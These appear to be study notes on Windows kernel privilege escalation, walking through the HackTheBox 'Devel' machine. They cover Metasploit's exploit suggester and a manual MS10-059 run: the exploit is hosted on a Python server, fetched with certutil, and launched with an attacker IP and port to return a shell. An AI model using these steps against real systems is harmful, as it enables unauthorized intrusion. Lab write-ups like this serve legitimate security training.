Overview

![[image.BPHLW1.png]] ![[image.O2EHW1.png]]

• The reason we need "system info" is because there are specific kernel exploits depending on the Windows build.
• If we own the Kernel, we own the system - that's what we are trying to do.

Escalation with Metasploit (Example - Devel HTB)

1. Background the meterpreter session2. Search and use the exploit you found by priv suggester ![[image.BPVLW1.png]]

2. Search and use the exploit you found by priv suggester ![[image.GMWMW1.png]]

3. Set the appropriate meterpreter session (and the other options) ![[image.T59QW1.png]]

4. Run and get another meterpreter session! ![[image.ILWHW1.png]]

5. Be root ![[image.1GM9V1.png]]

Manual Kernel Exploitation (Devel - HTB)

1. Search for the specific kernel exploit in Google

• ms10-015 doesn't work because we don't have GUI access
• so keep working through them & researching each one
• Rest of example is with MS10-059 (chimichurri exploit)

2. Downloaded the .exe to attacking machine ![[image.59C9V1.png]]

3. Set up Python HTTP server on attacking machine to host the file for victim to download

4. Go to temp folder (likely have write access here) ![[image.ZQL8V1.png]]

5. Download the file with certutil command (similar to wgeton Linux) ![[image.MLLGW1.png]]

6. Run the command with proper syntax (ms.exe <attacker_IP> <attacker_port>) ![[image.PR0HW1.png]]

7. On attacking machine, open another shell with the correct port ![[image.EEODW1.png]]

8. Become root! ![[image.TYR6V1.png]]